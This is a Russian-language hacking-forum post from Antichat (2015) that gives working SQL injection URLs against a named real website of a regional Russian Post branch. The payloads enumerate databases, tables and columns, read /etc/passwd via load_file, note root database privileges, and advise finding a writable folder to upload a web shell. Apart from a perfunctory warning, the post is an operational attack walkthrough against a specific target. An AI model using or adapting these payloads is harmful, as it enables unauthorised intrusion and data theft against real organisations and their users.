ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.03.2015, 19:46
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от teh
teh said:
А как вы узнали что таблица лежить в базе ftpusers. Никак немогу понять, можете рассказать пожалуйста
Сообщение от None
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,version(),(select(@x)from(select( @x:=0x00),(select(0)from(information_schema.column s)where(table_schema!=0x696e666f726d6174696f6e5f73 6368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,column_name))))x), 4,5,6,7+--
либо почитай мануал, как узнать таблици и колонки в БД
Сообщение от None
http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,version(),table_name,4,5,6,7+from +information_schema.tables+--
права БД рутовые, кавычки не фильтруются и не слешируются:
Сообщение от None
http://www.volgufps.ru/pochtamt5.php?pocht=%27-1%27+union+select+1,version(),load_file(%27/etc/passwd%27),4,5,6,7+from+mysql.user+--
вам остается только найти врайтабельную папку и залить шелл
P.S: 2011 УФПС Волгоградской области
- филиал ФГУП «Почта России»
Помните об ответственности ломая подобные ресурсы!!!
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид